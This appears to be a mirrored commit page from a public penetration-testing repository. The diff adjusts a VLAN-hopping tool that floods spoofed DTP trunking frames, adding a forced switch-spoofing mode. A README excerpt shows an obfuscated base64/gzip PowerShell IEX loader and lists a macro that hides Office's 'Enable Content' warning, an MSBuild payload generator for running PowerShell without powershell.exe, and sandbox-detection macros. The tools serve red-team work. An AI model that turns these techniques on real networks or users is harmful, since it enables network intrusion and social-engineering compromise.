mirror of
https://github.com/mgeeky/Penetration-Testing-Tools.git
synced 2024-12-22 09:05:06 +01:00
VLANHopper got improved a bit
This commit is contained in:
parent
b0d285951d
commit
ce29ec0e39
20
networks/VLANHopperDTP.py
Normal file → Executable file
20
networks/VLANHopperDTP.py
Normal file → Executable file
@ -274,7 +274,7 @@ def floodTrunkingRequests():
|
||||
Logger.dbg('SENT: DTP Trunk Keep-Alive:\n{}'.format(frame.summary()))
|
||||
send(frame, iface = config['interface'], verbose = False)
|
||||
|
||||
time.sleep(30)
|
||||
time.sleep(config['timeout'] / 3)
|
||||
|
||||
def engageDot1qSniffer():
|
||||
global dot1qSnifferStarted
|
||||
@ -335,6 +335,17 @@ def processDtps(dtps):
|
||||
attackEngaged = True
|
||||
time.sleep(5)
|
||||
|
||||
if config['force']:
|
||||
Logger.ok('FORCED VLAN Hopping via Switch Spoofing.')
|
||||
Logger.ok('Flooding with fake Access/Desirable DTP frames...\n')
|
||||
|
||||
t = threading.Thread(target = floodTrunkingRequests)
|
||||
t.daemon = True
|
||||
t.start()
|
||||
|
||||
attackEngaged = True
|
||||
time.sleep(5)
|
||||
|
||||
if attackEngaged:
|
||||
engageDot1qSniffer()
|
||||
|
||||
@ -385,7 +396,7 @@ def addVlanIface(vlan):
|
||||
tempfiles.append(pidFile)
|
||||
tempfiles.append(dbFile)
|
||||
|
||||
Logger.info('So far so good, subinterface {} added.'.format(subif))
|
||||
Logger.dbg('So far so good, subinterface {} added.'.format(subif))
|
||||
|
||||
ret = False
|
||||
for attempt in range(3):
|
||||
@ -456,7 +467,7 @@ def sniffThread():
|
||||
|
||||
if len(dtps) > 0 or config['force']:
|
||||
if len(dtps) > 0:
|
||||
Logger.dbg('Got {} DTP frames.\n'.format(
|
||||
Logger.info('Got {} DTP frames.\n'.format(
|
||||
len(dtps)
|
||||
))
|
||||
else:
|
||||
@ -572,6 +583,9 @@ def parseOptions(argv):
|
||||
config['commands'] = args.command
|
||||
config['exitcommands'] = args.exitcommand
|
||||
|
||||
if args.force:
|
||||
config['timeout'] = 30
|
||||
|
||||
return args
|
||||
|
||||
def main(argv):
|
||||
|
@ -14,6 +14,8 @@ $s = New-Object IO.MemoryStream(, [Convert]::FromBase64String('H4sIAMkfcloC/3u/e
|
||||
IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s, [IO.Compression.CompressionMode]::Decompress))).ReadToEnd();
|
||||
```
|
||||
|
||||
- **`delete-warning-div-macro.vbs`** - VBA Macro function to be used as a Social Engineering trick removing "Enable Content" warning message as the topmost floating text box with given name. ([gist](https://gist.github.com/mgeeky/9cb6acdec31c8a70cc037c84c77a359c))
|
||||
|
||||
- **`generateMSBuildPowershellXML.py`** - Powershell via MSBuild inline-task XML payload generation script - To be used during Red-Team assignments to launch Powershell payloads without using `powershell.exe` ([gist](https://gist.github.com/mgeeky/df9f313cfe468e56c59268b958319bcb))
|
||||
|
||||
Example output **not minimized**:
|
||||
@ -101,8 +103,6 @@ ngTask></Project>
|
||||
------------------------------------------------------------------------------------
|
||||
```
|
||||
|
||||
- **`delete-warning-div-macro.vbs`** - VBA Macro function to be used as a Social Engineering trick removing "Enable Content" warning message as the topmost floating text box with given name. ([gist](https://gist.github.com/mgeeky/9cb6acdec31c8a70cc037c84c77a359c))
|
||||
|
||||
- **`Invoke-Command-Cred-Example.ps1`** - Example of using PSRemoting with credentials passed directly from command line. ([gist](https://gist.github.com/mgeeky/de4ecf952ddce774d241b85cfbf97faf))
|
||||
|
||||
- **`MacroDetectSandbox.vbs`** - Visual Basic script responsible for detecting Sandbox environments, as presented in modern Trojan Droppers implemented in Macros. ([gist](https://gist.github.com/mgeeky/61e4dfe305ab719e9874ca442779a91d))
|
||||
|
Loading…
Reference in New Issue
Block a user